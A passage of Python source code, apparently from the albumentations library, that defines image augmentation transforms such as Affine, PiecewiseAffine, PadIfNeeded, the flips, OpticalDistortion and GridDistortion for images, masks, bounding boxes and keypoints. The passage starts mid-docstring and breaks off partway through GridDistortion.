number): Same as cval but only for masks.\n mode (int): OpenCV border flag.\n fit_output (bool): If True, the image plane size and position will be adjusted to tightly capture\n the whole image after affine transformation (`translate_percent` and `translate_px` are ignored).\n Otherwise (``False``), parts of the transformed image may end up outside the image plane.\n Fitting the output shape can be useful to avoid corners of the image being outside the image plane\n after applying rotations. Default: False\n keep_ratio (bool): When True, the original aspect ratio will be kept when the random scale is applied.\n Default: False.\n rotate_method (str): rotation method used for the bounding boxes. Should be one of \"largest_box\" or\n \"ellipse\"[1].\n Default: \"largest_box\"\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n Reference:\n [1] https://arxiv.org/abs/2109.13488\n \"\"\"\n\n def __init__(\n self,\n scale: Optional[Union[float, Sequence[float], dict]] = None,\n translate_percent: Optional[Union[float, Sequence[float], dict]] = None,\n translate_px: Optional[Union[int, Sequence[int], dict]] = None,\n rotate: Optional[Union[float, Sequence[float]]] = None,\n shear: Optional[Union[float, Sequence[float], dict]] = None,\n interpolation: int = cv2.INTER_LINEAR,\n mask_interpolation: int = cv2.INTER_NEAREST,\n cval: Union[int, float, Sequence[int], Sequence[float]] = 0,\n cval_mask: Union[int, float, Sequence[int], Sequence[float]] = 0,\n mode: int = cv2.BORDER_CONSTANT,\n fit_output: bool = False,\n keep_ratio: bool = False,\n rotate_method: str = \"largest_box\",\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super().__init__(always_apply=always_apply, p=p)\n\n params = [scale, translate_percent, translate_px, rotate, shear]\n if all([p is None for p in params]):\n scale = {\"x\": (0.9, 1.1), \"y\": (0.9, 1.1)}\n translate_percent = {\"x\": (-0.1, 0.1), \"y\": (-0.1, 0.1)}\n rotate = (-15, 15)\n shear = {\"x\": (-10, 10), \"y\": (-10, 10)}\n else:\n scale = scale if scale is not None else 1.0\n rotate = rotate if rotate is not None else 0.0\n shear = shear if shear is not None else 0.0\n\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.scale = self._handle_dict_arg(scale, \"scale\")\n self.translate_percent, self.translate_px = self._handle_translate_arg(translate_px, translate_percent)\n self.rotate = to_tuple(rotate, rotate)\n self.fit_output = fit_output\n self.shear = self._handle_dict_arg(shear, \"shear\")\n self.keep_ratio = keep_ratio\n self.rotate_method = rotate_method\n\n if self.keep_ratio and self.scale[\"x\"] != self.scale[\"y\"]:\n raise ValueError(\n \"When keep_ratio is True, the x and y scale range should be identical. got {}\".format(self.scale)\n )\n\n def get_transform_init_args_names(self):\n return (\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"mode\",\n \"scale\",\n \"translate_percent\",\n \"translate_px\",\n \"rotate\",\n \"fit_output\",\n \"shear\",\n \"cval_mask\",\n \"keep_ratio\",\n \"rotate_method\",\n )\n\n @staticmethod\n def _handle_dict_arg(val: Union[float, Sequence[float], dict], name: str, default: float = 1.0):\n if isinstance(val, dict):\n if \"x\" not in val and \"y\" not in val:\n raise ValueError(\n f'Expected {name} dictionary to contain at least key \"x\" or ' 'key \"y\". Found neither of them.'\n )\n x = val.get(\"x\", default)\n y = val.get(\"y\", default)\n return {\"x\": to_tuple(x, x), \"y\": to_tuple(y, y)}\n return {\"x\": to_tuple(val, val), \"y\": to_tuple(val, val)}\n\n @classmethod\n def _handle_translate_arg(\n cls,\n translate_px: Optional[Union[float, Sequence[float], dict]],\n translate_percent: Optional[Union[float, Sequence[float], dict]],\n ):\n if translate_percent is None and translate_px is None:\n translate_px = 0\n\n if translate_percent is not None and translate_px is not None:\n raise ValueError(\n \"Expected either translate_percent or translate_px to be \" \"provided, \" \"but neither of them was.\"\n )\n\n if translate_percent is not None:\n # translate by percent\n return cls._handle_dict_arg(translate_percent, \"translate_percent\", default=0.0), translate_px\n\n if translate_px is None:\n raise ValueError(\"translate_px is None.\")\n # translate by pixels\n return translate_percent, cls._handle_dict_arg(translate_px, \"translate_px\")\n\n def apply(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.interpolation,\n cval=self.cval,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_mask(\n self,\n img: np.ndarray,\n matrix: skimage.transform.ProjectiveTransform = None,\n output_shape: Sequence[int] = (),\n **params\n ) -> np.ndarray:\n return F.warp_affine(\n img,\n matrix,\n interpolation=self.mask_interpolation,\n cval=self.cval_mask,\n mode=self.mode,\n output_shape=output_shape,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n matrix: skimage.transform.ProjectiveTransform = None,\n rows: int = 0,\n cols: int = 0,\n output_shape: Sequence[int] = (),\n **params\n ) -> BoxInternalType:\n return F.bbox_affine(bbox, matrix, self.rotate_method, rows, cols, output_shape)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n matrix: Optional[skimage.transform.ProjectiveTransform] = None,\n scale: Optional[dict] = None,\n **params\n ) -> KeypointInternalType:\n assert scale is not None and matrix is not None\n return F.keypoint_affine(keypoint, matrix=matrix, scale=scale)\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params: dict) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n translate: Dict[str, Union[int, float]]\n if self.translate_px is not None:\n translate = {key: random.randint(*value) for key, value in self.translate_px.items()}\n elif self.translate_percent is not None:\n translate = {key: random.uniform(*value) for key, value in self.translate_percent.items()}\n translate[\"x\"] = translate[\"x\"] * w\n translate[\"y\"] = translate[\"y\"] * h\n else:\n translate = {\"x\": 0, \"y\": 0}\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n shear = {key: -random.uniform(*value) for key, value in self.shear.items()}\n scale = {key: random.uniform(*value) for key, value in self.scale.items()}\n if self.keep_ratio:\n scale[\"y\"] = scale[\"x\"]\n\n # Look to issue https://github.com/albumentations-team/albumentations/issues/1079\n rotate = -random.uniform(*self.rotate)\n\n # for images we use additional shifts of (0.5, 0.5) as otherwise\n # we get an ugly black border for 90deg rotations\n shift_x = w / 2 - 0.5\n shift_y = h / 2 - 0.5\n\n matrix_to_topleft = skimage.transform.SimilarityTransform(translation=[-shift_x, -shift_y])\n matrix_shear_y_rot = skimage.transform.AffineTransform(rotation=-np.pi / 2)\n matrix_shear_y = skimage.transform.AffineTransform(shear=np.deg2rad(shear[\"y\"]))\n matrix_shear_y_rot_inv = skimage.transform.AffineTransform(rotation=np.pi / 2)\n matrix_transforms = skimage.transform.AffineTransform(\n scale=(scale[\"x\"], scale[\"y\"]),\n translation=(translate[\"x\"], translate[\"y\"]),\n rotation=np.deg2rad(rotate),\n shear=np.deg2rad(shear[\"x\"]),\n )\n matrix_to_center = skimage.transform.SimilarityTransform(translation=[shift_x, shift_y])\n matrix = (\n matrix_to_topleft\n + matrix_shear_y_rot\n + matrix_shear_y\n + matrix_shear_y_rot_inv\n + matrix_transforms\n + matrix_to_center\n )\n if self.fit_output:\n matrix, output_shape = self._compute_affine_warp_output_shape(matrix, params[\"image\"].shape)\n else:\n output_shape = params[\"image\"].shape\n\n return {\n \"rotate\": rotate,\n \"scale\": scale,\n \"matrix\": matrix,\n \"output_shape\": output_shape,\n }\n\n @staticmethod\n def _compute_affine_warp_output_shape(\n matrix: skimage.transform.ProjectiveTransform, input_shape: Sequence[int]\n ) -> Tuple[skimage.transform.ProjectiveTransform, Sequence[int]]:\n height, width = input_shape[:2]\n\n if height == 0 or width == 0:\n return matrix, input_shape\n\n # determine shape of output image\n corners = np.array([[0, 0], [0, height - 1], [width - 1, height - 1], [width - 1, 0]])\n corners = matrix(corners)\n minc = corners[:, 0].min()\n minr = corners[:, 1].min()\n maxc = corners[:, 0].max()\n maxr = corners[:, 1].max()\n out_height = maxr - minr + 1\n out_width = maxc - minc + 1\n if len(input_shape) == 3:\n output_shape = np.ceil((out_height, out_width, input_shape[2]))\n else:\n output_shape = np.ceil((out_height, out_width))\n output_shape_tuple = tuple([int(v) for v in output_shape.tolist()])\n # fit output image in new shape\n translation = (-minc, -minr)\n matrix_to_fit = skimage.transform.SimilarityTransform(translation=translation)\n matrix = matrix + matrix_to_fit\n return matrix, output_shape_tuple\n\n\nclass PiecewiseAffine(DualTransform):\n \"\"\"Apply affine transformations that differ between local neighbourhoods.\n This augmentation places a regular grid of points on an image and randomly moves the neighbourhood of these point\n around via affine transformations. This leads to local distortions.\n\n This is mostly a wrapper around scikit-image's ``PiecewiseAffine``.\n See also ``Affine`` for a similar technique.\n\n Note:\n This augmenter is very slow. Try to use ``ElasticTransformation`` instead, which is at least 10x faster.\n\n Note:\n For coordinate-based inputs (keypoints, bounding boxes, polygons, ...),\n this augmenter still has to perform an image-based augmentation,\n which will make it significantly slower and not fully correct for such inputs than other transforms.\n\n Args:\n scale (float, tuple of float): Each point on the regular grid is moved around via a normal distribution.\n This scale factor is equivalent to the normal distribution's sigma.\n Note that the jitter (how far each point is moved in which direction) is multiplied by the height/width of\n the image if ``absolute_scale=False`` (default), so this scale can be the same for different sized images.\n Recommended values are in the range ``0.01`` to ``0.05`` (weak to strong augmentations).\n * If a single ``float``, then that value will always be used as the scale.\n * If a tuple ``(a, b)`` of ``float`` s, then a random value will\n be uniformly sampled per image from the interval ``[a, b]``.\n nb_rows (int, tuple of int): Number of rows of points that the regular grid should have.\n Must be at least ``2``. For large images, you might want to pick a higher value than ``4``.\n You might have to then adjust scale to lower values.\n * If a single ``int``, then that value will always be used as the number of rows.\n * If a tuple ``(a, b)``, then a value from the discrete interval\n ``[a..b]`` will be uniformly sampled per image.\n nb_cols (int, tuple of int): Number of columns. Analogous to `nb_rows`.\n interpolation (int): The order of interpolation. The order has to be in the range 0-5:\n - 0: Nearest-neighbor\n - 1: Bi-linear (default)\n - 2: Bi-quadratic\n - 3: Bi-cubic\n - 4: Bi-quartic\n - 5: Bi-quintic\n mask_interpolation (int): same as interpolation but for mask.\n cval (number): The constant value to use when filling in newly created pixels.\n cval_mask (number): Same as cval but only for masks.\n mode (str): {'constant', 'edge', 'symmetric', 'reflect', 'wrap'}, optional\n Points outside the boundaries of the input are filled according\n to the given mode. Modes match the behaviour of `numpy.pad`.\n absolute_scale (bool): Take `scale` as an absolute value rather than a relative value.\n keypoints_threshold (float): Used as threshold in conversion from distance maps to keypoints.\n The search for keypoints works by searching for the\n argmin (non-inverted) or argmax (inverted) in each channel. This\n parameters contains the maximum (non-inverted) or minimum (inverted) value to accept in order to view a hit\n as a keypoint. Use ``None`` to use no min/max. Default: 0.01\n\n Targets:\n image, mask, keypoints, bboxes\n\n Image types:\n uint8, float32\n\n \"\"\"\n\n def __init__(\n self,\n scale: ScaleFloatType = (0.03, 0.05),\n nb_rows: Union[int, Sequence[int]] = 4,\n nb_cols: Union[int, Sequence[int]] = 4,\n interpolation: int = 1,\n mask_interpolation: int = 0,\n cval: int = 0,\n cval_mask: int = 0,\n mode: str = \"constant\",\n absolute_scale: bool = False,\n always_apply: bool = False,\n keypoints_threshold: float = 0.01,\n p: float = 0.5,\n ):\n super(PiecewiseAffine, self).__init__(always_apply, p)\n\n self.scale = to_tuple(scale, scale)\n self.nb_rows = to_tuple(nb_rows, nb_rows)\n self.nb_cols = to_tuple(nb_cols, nb_cols)\n self.interpolation = interpolation\n self.mask_interpolation = mask_interpolation\n self.cval = cval\n self.cval_mask = cval_mask\n self.mode = mode\n self.absolute_scale = absolute_scale\n self.keypoints_threshold = keypoints_threshold\n\n def get_transform_init_args_names(self):\n return (\n \"scale\",\n \"nb_rows\",\n \"nb_cols\",\n \"interpolation\",\n \"mask_interpolation\",\n \"cval\",\n \"cval_mask\",\n \"mode\",\n \"absolute_scale\",\n \"keypoints_threshold\",\n )\n\n @property\n def targets_as_params(self):\n return [\"image\"]\n\n def get_params_dependent_on_targets(self, params) -> dict:\n h, w = params[\"image\"].shape[:2]\n\n nb_rows = np.clip(random.randint(*self.nb_rows), 2, None)\n nb_cols = np.clip(random.randint(*self.nb_cols), 2, None)\n nb_cells = nb_cols * nb_rows\n scale = random.uniform(*self.scale)\n\n jitter: np.ndarray = random_utils.normal(0, scale, (nb_cells, 2))\n if not np.any(jitter > 0):\n return {\"matrix\": None}\n\n y = np.linspace(0, h, nb_rows)\n x = np.linspace(0, w, nb_cols)\n\n # (H, W) and (H, W) for H=rows, W=cols\n xx_src, yy_src = np.meshgrid(x, y)\n\n # (1, HW, 2) => (HW, 2) for H=rows, W=cols\n points_src = np.dstack([yy_src.flat, xx_src.flat])[0]\n\n if self.absolute_scale:\n jitter[:, 0] = jitter[:, 0] / h if h > 0 else 0.0\n jitter[:, 1] = jitter[:, 1] / w if w > 0 else 0.0\n\n jitter[:, 0] = jitter[:, 0] * h\n jitter[:, 1] = jitter[:, 1] * w\n\n points_dest = np.copy(points_src)\n points_dest[:, 0] = points_dest[:, 0] + jitter[:, 0]\n points_dest[:, 1] = points_dest[:, 1] + jitter[:, 1]\n\n # Restrict all destination points to be inside the image plane.\n # This is necessary, as otherwise keypoints could be augmented\n # outside of the image plane and these would be replaced by\n # (-1, -1), which would not conform with the behaviour of the other augmenters.\n points_dest[:, 0] = np.clip(points_dest[:, 0], 0, h - 1)\n points_dest[:, 1] = np.clip(points_dest[:, 1], 0, w - 1)\n\n matrix = skimage.transform.PiecewiseAffineTransform()\n matrix.estimate(points_src[:, ::-1], points_dest[:, ::-1])\n\n return {\n \"matrix\": matrix,\n }\n\n def apply(self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.interpolation, self.mode, self.cval)\n\n def apply_to_mask(\n self, img: np.ndarray, matrix: skimage.transform.PiecewiseAffineTransform = None, **params\n ) -> np.ndarray:\n return F.piecewise_affine(img, matrix, self.mask_interpolation, self.mode, self.cval_mask)\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ) -> BoxInternalType:\n return F.bbox_piecewise_affine(bbox, matrix, rows, cols, self.keypoints_threshold)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n rows: int = 0,\n cols: int = 0,\n matrix: skimage.transform.PiecewiseAffineTransform = None,\n **params\n ):\n return F.keypoint_piecewise_affine(keypoint, matrix, rows, cols, self.keypoints_threshold)\n\n\nclass PadIfNeeded(DualTransform):\n \"\"\"Pad side of the image / max if side is less than desired number.\n\n Args:\n min_height (int): minimal result image height.\n min_width (int): minimal result image width.\n pad_height_divisor (int): if not None, ensures image height is dividable by value of this argument.\n pad_width_divisor (int): if not None, ensures image width is dividable by value of this argument.\n position (Union[str, PositionType]): Position of the image. should be PositionType.CENTER or\n PositionType.TOP_LEFT or PositionType.TOP_RIGHT or PositionType.BOTTOM_LEFT or PositionType.BOTTOM_RIGHT.\n or PositionType.RANDOM. Default: PositionType.CENTER.\n border_mode (OpenCV flag): OpenCV border mode.\n value (int, float, list of int, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of int,\n list of float): padding value for mask if border_mode is cv2.BORDER_CONSTANT.\n p (float): probability of applying the transform. Default: 1.0.\n\n Targets:\n image, mask, bbox, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n class PositionType(Enum):\n CENTER = \"center\"\n TOP_LEFT = \"top_left\"\n TOP_RIGHT = \"top_right\"\n BOTTOM_LEFT = \"bottom_left\"\n BOTTOM_RIGHT = \"bottom_right\"\n RANDOM = \"random\"\n\n def __init__(\n self,\n min_height: Optional[int] = 1024,\n min_width: Optional[int] = 1024,\n pad_height_divisor: Optional[int] = None,\n pad_width_divisor: Optional[int] = None,\n position: Union[PositionType, str] = PositionType.CENTER,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 1.0,\n ):\n if (min_height is None) == (pad_height_divisor is None):\n raise ValueError(\"Only one of 'min_height' and 'pad_height_divisor' parameters must be set\")\n\n if (min_width is None) == (pad_width_divisor is None):\n raise ValueError(\"Only one of 'min_width' and 'pad_width_divisor' parameters must be set\")\n\n super(PadIfNeeded, self).__init__(always_apply, p)\n self.min_height = min_height\n self.min_width = min_width\n self.pad_width_divisor = pad_width_divisor\n self.pad_height_divisor = pad_height_divisor\n self.position = PadIfNeeded.PositionType(position)\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def update_params(self, params, **kwargs):\n params = super(PadIfNeeded, self).update_params(params, **kwargs)\n rows = params[\"rows\"]\n cols = params[\"cols\"]\n\n if self.min_height is not None:\n if rows < self.min_height:\n h_pad_top = int((self.min_height - rows) / 2.0)\n h_pad_bottom = self.min_height - rows - h_pad_top\n else:\n h_pad_top = 0\n h_pad_bottom = 0\n else:\n pad_remained = rows % self.pad_height_divisor\n pad_rows = self.pad_height_divisor - pad_remained if pad_remained > 0 else 0\n\n h_pad_top = pad_rows // 2\n h_pad_bottom = pad_rows - h_pad_top\n\n if self.min_width is not None:\n if cols < self.min_width:\n w_pad_left = int((self.min_width - cols) / 2.0)\n w_pad_right = self.min_width - cols - w_pad_left\n else:\n w_pad_left = 0\n w_pad_right = 0\n else:\n pad_remainder = cols % self.pad_width_divisor\n pad_cols = self.pad_width_divisor - pad_remainder if pad_remainder > 0 else 0\n\n w_pad_left = pad_cols // 2\n w_pad_right = pad_cols - w_pad_left\n\n h_pad_top, h_pad_bottom, w_pad_left, w_pad_right = self.__update_position_params(\n h_top=h_pad_top, h_bottom=h_pad_bottom, w_left=w_pad_left, w_right=w_pad_right\n )\n\n params.update(\n {\n \"pad_top\": h_pad_top,\n \"pad_bottom\": h_pad_bottom,\n \"pad_left\": w_pad_left,\n \"pad_right\": w_pad_right,\n }\n )\n return params\n\n def apply(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.value,\n )\n\n def apply_to_mask(\n self, img: np.ndarray, pad_top: int = 0, pad_bottom: int = 0, pad_left: int = 0, pad_right: int = 0, **params\n ) -> np.ndarray:\n return F.pad_with_params(\n img,\n pad_top,\n pad_bottom,\n pad_left,\n pad_right,\n border_mode=self.border_mode,\n value=self.mask_value,\n )\n\n def apply_to_bbox(\n self,\n bbox: BoxInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n rows: int = 0,\n cols: int = 0,\n **params\n ) -> BoxInternalType:\n x_min, y_min, x_max, y_max = denormalize_bbox(bbox, rows, cols)[:4]\n bbox = x_min + pad_left, y_min + pad_top, x_max + pad_left, y_max + pad_top\n return normalize_bbox(bbox, rows + pad_top + pad_bottom, cols + pad_left + pad_right)\n\n def apply_to_keypoint(\n self,\n keypoint: KeypointInternalType,\n pad_top: int = 0,\n pad_bottom: int = 0,\n pad_left: int = 0,\n pad_right: int = 0,\n **params\n ) -> KeypointInternalType:\n x, y, angle, scale = keypoint[:4]\n return x + pad_left, y + pad_top, angle, scale\n\n def get_transform_init_args_names(self):\n return (\n \"min_height\",\n \"min_width\",\n \"pad_height_divisor\",\n \"pad_width_divisor\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n )\n\n def __update_position_params(\n self, h_top: int, h_bottom: int, w_left: int, w_right: int\n ) -> Tuple[int, int, int, int]:\n if self.position == PadIfNeeded.PositionType.TOP_LEFT:\n h_bottom += h_top\n w_right += w_left\n h_top = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.TOP_RIGHT:\n h_bottom += h_top\n w_left += w_right\n h_top = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_LEFT:\n h_top += h_bottom\n w_right += w_left\n h_bottom = 0\n w_left = 0\n\n elif self.position == PadIfNeeded.PositionType.BOTTOM_RIGHT:\n h_top += h_bottom\n w_left += w_right\n h_bottom = 0\n w_right = 0\n\n elif self.position == PadIfNeeded.PositionType.RANDOM:\n h_pad = h_top + h_bottom\n w_pad = w_left + w_right\n h_top = random.randint(0, h_pad)\n h_bottom = h_pad - h_top\n w_left = random.randint(0, w_pad)\n w_right = w_pad - w_left\n\n return h_top, h_bottom, w_left, w_right\n\n\nclass VerticalFlip(DualTransform):\n \"\"\"Flip the input vertically around the x-axis.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.vflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_vflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_vflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass HorizontalFlip(DualTransform):\n \"\"\"Flip the input horizontally around the y-axis.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n if img.ndim == 3 and img.shape[2] > 1 and img.dtype == np.uint8:\n # Opencv is faster than numpy only in case of\n # non-gray scale 8bits images\n return F.hflip_cv2(img)\n\n return F.hflip(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_hflip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_hflip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Flip(DualTransform):\n \"\"\"Flip the input either horizontally, vertically or both horizontally and vertically.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, d: int = 0, **params) -> np.ndarray:\n \"\"\"Args:\n d (int): code that specifies how to flip the input. 0 for vertical flipping, 1 for horizontal flipping,\n -1 for both vertical and horizontal flipping (which is also could be seen as rotating the input by\n 180 degrees).\n \"\"\"\n return F.random_flip(img, d)\n\n def get_params(self):\n # Random int in the range [-1, 1]\n return {\"d\": random.randint(-1, 1)}\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_flip(bbox, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_flip(keypoint, **params)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass Transpose(DualTransform):\n \"\"\"Transpose the input by swapping rows and columns.\n\n Args:\n p (float): probability of applying the transform. Default: 0.5.\n\n Targets:\n image, mask, bboxes, keypoints\n\n Image types:\n uint8, float32\n \"\"\"\n\n def apply(self, img: np.ndarray, **params) -> np.ndarray:\n return F.transpose(img)\n\n def apply_to_bbox(self, bbox: BoxInternalType, **params) -> BoxInternalType:\n return F.bbox_transpose(bbox, 0, **params)\n\n def apply_to_keypoint(self, keypoint: KeypointInternalType, **params) -> KeypointInternalType:\n return F.keypoint_transpose(keypoint)\n\n def get_transform_init_args_names(self):\n return ()\n\n\nclass OpticalDistortion(DualTransform):\n \"\"\"\n Args:\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.05, 0.05).\n shift_limit (float, (float, float))): If shift_limit is a single float, the range\n will be (-shift_limit, shift_limit). Default: (-0.05, 0.05).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n\n Targets:\n image, mask, bbox\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n distort_limit: ScaleFloatType = 0.05,\n shift_limit: ScaleFloatType = 0.05,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(OpticalDistortion, self).__init__(always_apply, p)\n self.shift_limit = to_tuple(shift_limit)\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n\n def apply(\n self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, k: int = 0, dx: int = 0, dy: int = 0, **params) -> np.ndarray:\n return F.optical_distortion(img, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n\n def apply_to_bbox(self, bbox: BoxInternalType, k: int = 0, dx: int = 0, dy: int = 0, **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.optical_distortion(mask, k, dx, dy, cv2.INTER_NEAREST, self.border_mode, self.mask_value)\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, cols)\n return bbox_returned\n\n def get_params(self):\n return {\n \"k\": random.uniform(self.distort_limit[0], self.distort_limit[1]),\n \"dx\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n \"dy\": round(random.uniform(self.shift_limit[0], self.shift_limit[1])),\n }\n\n def get_transform_init_args_names(self):\n return (\n \"distort_limit\",\n \"shift_limit\",\n \"interpolation\",\n \"border_mode\",\n \"value\",\n \"mask_value\",\n )\n\n\nclass GridDistortion(DualTransform):\n \"\"\"\n Args:\n num_steps (int): count of grid cells on each side.\n distort_limit (float, (float, float)): If distort_limit is a single float, the range\n will be (-distort_limit, distort_limit). Default: (-0.03, 0.03).\n interpolation (OpenCV flag): flag that is used to specify the interpolation algorithm. Should be one of:\n cv2.INTER_NEAREST, cv2.INTER_LINEAR, cv2.INTER_CUBIC, cv2.INTER_AREA, cv2.INTER_LANCZOS4.\n Default: cv2.INTER_LINEAR.\n border_mode (OpenCV flag): flag that is used to specify the pixel extrapolation method. Should be one of:\n cv2.BORDER_CONSTANT, cv2.BORDER_REPLICATE, cv2.BORDER_REFLECT, cv2.BORDER_WRAP, cv2.BORDER_REFLECT_101.\n Default: cv2.BORDER_REFLECT_101\n value (int, float, list of ints, list of float): padding value if border_mode is cv2.BORDER_CONSTANT.\n mask_value (int, float,\n list of ints,\n list of float): padding value if border_mode is cv2.BORDER_CONSTANT applied for masks.\n normalized (bool): if true, distortion will be normalized to do not go outside the image. Default: False\n See for more information: https://github.com/albumentations-team/albumentations/pull/722\n\n Targets:\n image, mask\n\n Image types:\n uint8, float32\n \"\"\"\n\n def __init__(\n self,\n num_steps: int = 5,\n distort_limit: ScaleFloatType = 0.3,\n interpolation: int = cv2.INTER_LINEAR,\n border_mode: int = cv2.BORDER_REFLECT_101,\n value: Optional[ImageColorType] = None,\n mask_value: Optional[ImageColorType] = None,\n normalized: bool = False,\n always_apply: bool = False,\n p: float = 0.5,\n ):\n super(GridDistortion, self).__init__(always_apply, p)\n self.num_steps = num_steps\n self.distort_limit = to_tuple(distort_limit)\n self.interpolation = interpolation\n self.border_mode = border_mode\n self.value = value\n self.mask_value = mask_value\n self.normalized = normalized\n\n def apply(\n self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), interpolation: int = cv2.INTER_LINEAR, **params\n ) -> np.ndarray:\n return F.grid_distortion(img, self.num_steps, stepsx, stepsy, interpolation, self.border_mode, self.value)\n\n def apply_to_mask(self, img: np.ndarray, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> np.ndarray:\n return F.grid_distortion(\n img, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n\n def apply_to_bbox(self, bbox: BoxInternalType, stepsx: Tuple = (), stepsy: Tuple = (), **params) -> BoxInternalType:\n rows, cols = params[\"rows\"], params[\"cols\"]\n mask = np.zeros((rows, cols), dtype=np.uint8)\n bbox_denorm = F.denormalize_bbox(bbox, rows, cols)\n x_min, y_min, x_max, y_max = bbox_denorm[:4]\n x_min, y_min, x_max, y_max = int(x_min), int(y_min), int(x_max), int(y_max)\n mask[y_min:y_max, x_min:x_max] = 1\n mask = F.grid_distortion(\n mask, self.num_steps, stepsx, stepsy, cv2.INTER_NEAREST, self.border_mode, self.mask_value\n )\n bbox_returned = bbox_from_mask(mask)\n bbox_returned = F.normalize_bbox(bbox_returned, rows, 